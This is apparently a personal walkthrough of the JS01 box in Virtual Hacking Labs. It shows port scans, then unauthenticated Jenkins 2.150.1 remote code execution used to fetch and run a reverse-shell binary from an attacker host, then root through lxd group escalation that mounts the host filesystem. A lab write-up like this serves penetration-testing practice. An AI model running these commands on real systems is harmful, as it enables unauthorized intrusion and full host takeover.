// notes/ Practice Boxes
🔵

JS01 — VHL (10.11.2.242)

22/tcp open ssh OpenSSH 7.6p1 Ubuntu

#virtual hacking labs#vhl#walkthrough#boxes#os:linux#tech:rce

JS01 — VHL (10.11.2.242)

Port Enumeration (10.11.2.242)

🐺 howlsec@kali
$22/tcp open ssh OpenSSH 7.6p1 Ubuntu
$8080/tcp open http Jetty 9.4.z-SNAPSHOT - Jenkins 2.150.1 (Dashboard)

Foothold: Jenkins RCE (orangetw awesome-jenkins-rce-2019)

Unauthenticated Jenkins 2.150.1 RCE (Orange Tsai's chain):

🐺 howlsec@kali
$git clone https://github.com/orangetw/awesome-jenkins-rce-2019.git
$# stage a bash reverse shell (/tmp/rev)
$python2 exp.py http://10.11.2.242:8080/ 'wget http://172.16.1.1/rev -O /tmp/rev'
$python2 exp.py http://10.11.2.242:8080/ 'chmod 777 /tmp/rev'
$python2 exp.py http://10.11.2.242:8080/ '/tmp/rev' # -> shell

Privesc: lxd group (EDB-46978)

linpeas shows membership of the lxd group:

🐺 howlsec@kali
$wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
$sudo bash build-alpine # -> alpine-*.tar.gz
$./46978.sh -f alpine-v3.22-x86_64-*.tar.gz # mounts host / into privileged container
$cd /mnt/root; cat /root/key.txt # 91rm74ic7jvhp47k5561